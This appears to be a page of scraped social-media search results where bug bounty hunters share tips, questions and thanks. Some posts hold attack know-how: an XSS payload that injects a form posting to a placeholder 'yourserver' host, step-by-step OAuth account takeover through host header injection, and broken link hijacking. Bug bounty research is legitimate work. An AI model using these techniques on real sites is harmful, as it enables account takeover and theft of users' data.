Search results
  1. Jan 30

    Some hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the , !

  2. Jan 31

    Steps: 0) Log in with Twitter 1) Host Header Injection [to a.cxx] 2) Generate OAuth token's link 3) Send link to victim; after victim authorizes 4) Verifier is sent to a.cxx 5) Reuse the token. Account Takeover by

  3. Jan 29

    If you have an XSS in a <form> tag, close it and open a new form that you are controlling. Payload: "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.

  4. Jan 31
  5. Jan 28
  6. Feb 2

    WooT! There is always a way. New short write-up! Chain the bugs till you get what you want. Some steps were not mentioned. RT, Like and Comments are appreciated. For any pentest work DM me :) 🎉🎉

  7. Jan 29

    My first bounty, after 25+ dups and 2 N/As. Got Hall of Fame in a few programs but never got paid. Thanks to all members of the bug bounty community. A special thanks to Sir & Sir for the guidance.

  8. Feb 1
  9. 7 hours ago

    Never underestimate the power of Google Dorking. Just found a defaced website for bugbounty program.

  10. Jan 30

    Episode #2 - We sit down with to talk about how to be successful in bug bounty, live events, music and creativity and of course, how to reach cosmic brain level 10. Listen on

  11. 1 hour ago

    Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc? Use 's get-title hack to grep out common titles:
      cat urls.txt | get-title -c 300 > titles.txt
      cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}'

  12. Hey, has anyone here targeted AT&T? If AT&T marks my report as triaged, does that mean my report is accepted 100% or not?

  13. 3 hours ago
    Replying to

    Next time add to your post to get maximum profit

  14. Feb 2

    BLH - Broken Link Hijacking. Just suppose your site uses cool.c/Script.js. After a few years cool.c decided to close its services. Now the story begins 😈 buys cool.c and then hosts Script.js. BOoOM. This happened to LinkedIn. READ BELOW

  15. Feb 2

    Thanks for the awesome shoutout in your video !

  16. Jan 31

    Any good external bug bounty program?

  17. Jan 31

    Do you know any labs (free or paid) to practice new CVEs online? Except and pentesteracademy

  18. Jan 31

    Install Python. Open yourself up to a world of open-source bug bounty tools. Don't put it off, because it will enrich your skills.

  19. Jan 30

    Button disabled? Inspect Element -> change from "disabled" to "enabled" -> Button enabled and action performed 💪🏻😆
